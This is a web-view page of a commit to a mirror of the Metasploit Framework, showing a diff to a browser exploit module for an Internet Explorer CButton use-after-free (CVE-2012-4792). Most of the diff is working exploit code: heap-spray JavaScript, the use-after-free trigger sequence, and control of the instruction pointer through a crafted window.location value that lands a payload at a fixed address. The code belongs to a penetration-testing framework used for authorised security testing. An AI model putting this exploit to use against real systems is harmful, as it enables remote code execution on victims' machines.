infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'master' of github.com:rapid7/metasploit-framework

bug/bundler_fix
Joshua J. Drake 2012-12-31 11:02:12 -06:00
parent dfa2bbc49a f7543e18fe
commit 2c411e3355
1 changed files with 6 additions and 37 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

43
modules/exploits/windows/browser/ie_cdwnbindinfo_uaf.rb → modules/exploits/windows/browser/ie_cbutton_uaf.rb
View File

@ -15,7 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info={})
super(update_info(info,
'Name' => "Microsoft Internet Explorer CDwnBindInfo Object Use-After-Free Vulnerability",
'Name' => "Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability",
'Description' => %q{
This module exploits a vulnerability found in Microsoft Internet Explorer. A
use-after-free condition occurs when a CButton object is freed, but a reference
@ -37,6 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
[ 'CVE', '2012-4792' ],
[ 'US-CERT-VU', '154201' ],
[ 'BID', '57070' ],
[ 'URL', 'http://blog.fireeye.com/research/2012/12/council-foreign-relations-water-hole-attack-details.html'],
[ 'URL', 'http://eromang.zataz.com/2012/12/29/attack-and-ie-0day-informations-used-against-council-on-foreign-relations/'],
[ 'URL', 'http://blog.vulnhunt.com/index.php/2012/12/29/new-ie-0day-coming-mshtmlcdwnbindinfo-object-use-after-free-vulnerability/' ],
@ -108,7 +109,7 @@ class Metasploit3 < Msf::Exploit::Remote
def ie_heap_spray(my_target, p)
js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
js_nops = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4), Rex::Arch.endian(target.arch))
# Land the payload at 0x0c0c0b30
js = %Q|
@ -124,7 +125,6 @@ class Metasploit3 < Msf::Exploit::Remote
for (var i=1; i < 0x300; i++) {
heap_obj.alloc(block);
}
var overflow = nops.substring(0, 10);
|
js = heaplib(js, {:noobfu => true})
@ -187,37 +187,11 @@ Stack Pivoting to eax:
<script>
#{js}
function exploit()
function helloWorld()
{
var e0 = null;
var e1 = null;
var e2 = null;
var arrObject = new Array(3000);
var elmObject = new Array(500);
for (var i = 0; i < arrObject.length; i++)
{
arrObject[i] = document.createElement('div');
arrObject[i].className = unescape("ababababababababababababababababababababa");
}
for (var i = 0; i < arrObject.length; i += 2)
{
arrObject[i].className = null;
}
CollectGarbage();
for (var i = 0; i < elmObject.length; i ++)
{
elmObject[i] = document.createElement('button');
}
for (var i = 1; i < arrObject.length; i += 2)
{
arrObject[i].className = null;
}
CollectGarbage();
try {
e0 = document.getElementById("a");
@ -230,19 +204,14 @@ Stack Pivoting to eax:
e2.appendChild(document.createElement('body'));
} catch(e) { }
CollectGarbage();
for(var i =0; i < 20; i++)
{
arrObject[i].className = unescape("ababababababababababababababababababababa");
}
var eip = window;
var data = "https://www.google.com/settings/account";
var data = "#{Rex::Text.rand_text_alpha(41)}";
eip.location = unescape("%u0b30%u0c0c" + data);
}
</script>
</head>
<body onload="eval(exploit())">
<body onload="eval(helloWorld())">
<form id="a">
</form>
<dfn id="b">